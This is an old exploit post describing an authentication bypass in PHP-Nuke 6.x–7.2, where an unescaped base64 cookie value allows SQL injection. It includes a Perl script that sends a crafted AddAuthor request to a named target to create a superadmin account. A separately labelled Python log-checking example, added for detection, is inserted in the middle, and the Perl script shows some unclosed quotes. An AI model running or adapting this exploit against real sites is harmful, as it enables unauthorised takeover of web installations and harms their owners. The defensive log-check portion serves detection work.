 PHPNuke Admin Level Bypass Exploit
Category: Vulnerability
Posted: 2005-04-08 by basher13
Views: 701

 
Update:
1:44 AM 4/8/2005

Subject:
" PHPNuke Admin Level Bypass Exploit "

Vulnerable version:
phpnuke 6.x-7.2

Description:
PHP-Nuke is a popular freeware content management system (CMS), written in PHP by
Francisco Burzi. It is used on many thousands of websites because it is free of
charge, easy to install and has a broad set of features.

Vulnerability:
An anonymous user may create a superadmin account without any authentication at all.
See the original code in auth.php, line 48:

$admintest = 0;

if(isset($admin) && $admin != "") {
    $admin = base64_decode($admin);
    $admin = explode(":", $admin);
    $aid = "$admin[0]";
    $pwd = "$admin[1]";

The base64-decoded variable "admin" from the cookie is exploded into its
components: the admin id and the password's md5 hash. As always with base64
encode/decode operations, care must be taken with special symbols, like single quotes.
Before the base64-decoded information is used, the addslashes() function must be applied.
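
The following log check is an added example, not part of the original advisory or of PHP-Nuke: it base64-decodes the "admin" value described above and flags requests whose admin id or md5 hash component contains unexpected characters such as single quotes. The character set allowed for admin ids, the function names and the sample log lines are assumptions made for illustration.

```python
import base64
import binascii
import re
from urllib.parse import urlsplit, parse_qs

# Assumed shape of a legitimate decoded value: "aid:md5hash", possibly
# followed by further ":"-separated fields.
AID_RE = re.compile(r"^[A-Za-z0-9_.-]{1,25}$")  # assumption: plain admin ids
MD5_RE = re.compile(r"^[0-9a-fA-F]{32}$")       # hex md5 of the password

def check_admin_value(value):
    """Return the reasons an `admin` value looks malformed ([] means fine)."""
    try:
        # parse_qs turns "+" into " ", so undo that before decoding.
        raw = base64.b64decode(value.replace(" ", "+"), validate=True)
    except (binascii.Error, ValueError):
        return ["not valid base64"]
    parts = raw.decode("latin-1").split(":")
    if len(parts) < 2:
        return ["no aid:pwd separator"]
    reasons = []
    if not AID_RE.match(parts[0]):
        reasons.append("unexpected characters in aid: %r" % parts[0])
    if not MD5_RE.match(parts[1]):
        reasons.append("pwd is not an md5 hash: %r" % parts[1])
    return reasons

def scan_log_line(line):
    """Check the `admin` query parameter of one access-log line."""
    m = re.search(r'"(?:GET|POST) (\S+)', line)
    if not m:
        return []
    query = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
    reasons = [r for v in query.get("admin", []) for r in check_admin_value(v)]
    if reasons and "AddAuthor" in query.get("op", []):
        reasons.append("AddAuthor requested with a malformed admin value")
    return reasons

# Constructed sample lines (not real traffic); the last one carries the
# `admin` string quoted in the advisory.
GOOD = base64.b64encode(b"editor:" + b"0" * 32).decode()
SAMPLE_LOG = [
    '192.0.2.10 - - [08/Apr/2005:01:44:00 +0000] "GET /phpnuke/admin.php?admin=%s HTTP/1.0" 200 512' % GOOD,
    '192.0.2.66 - - [08/Apr/2005:01:45:00 +0000] "GET /phpnuke/admin.php?op=AddAuthor'
    '&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox HTTP/1.0" 200 512',
]
if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(scan_log_line(line) or "ok", "<-", line[:40])
```

check_admin_value() can be applied to a captured cookie value as well, since access logs usually record only the query string.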




Exploit:
#!/usr/bin/perl
# PHPNuke Admin Level Bypass Exploit
# -----------------------------------
#
# Greats: Janek Vind "waraxe" (has discovered bug)
# Info: 98.to/infamous

use IO::Socket;

if (@ARGV < 4)
{

system "clear";

print "\nPHPNuke Admin Level Bypass Exploit\n\n";
print "------------------------------------------\n";
print "\n INFGP - Hacking&Security Research\n;
print "\n\n";
print "[-]Usage: phpnkb.pl [target_host] [path] [user] [pass] \n";
print "[!]Exam: phpnkb.pl www.target.com phpnuke jhondoe bego \n\n";
exit(1);
}

system "clear";

$server = $ARGV[0];
$folder = $ARGV[1];
$user = $ARGV[2];
$pass = $ARGV[3];

print "\n[+]Connecting to IP ...\n";
print $server;

$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80"); unless ($socket)
{
die "[-]$server connection FAILED\n"
}

print "[+]Connected\n\n";
print "[+]Send evil request..\n";

$string="eCcgVU5JT04gU0VMRUNUIDEvKjox";
$0day="admin.php?op=AddAuthor&add_aid=$user&add_name=God&add_pwd=$pass&add_email
=foo@bar.com&add_radminsuper=1&admin=$string";

print "[+]Sent 0day..\n\n";

print $socket "GET /$ARGV[1]/$0day";

print "[+]Attack successful!\n";
print "[>]User:$user\n";
print "[>]Pass:$pass\n;
print "[*]Has access Admin Level,have phun..\n";

close($socket);




Solution:
Upgrade to the next version.



Vendor URL:
http://phpnuke.org

 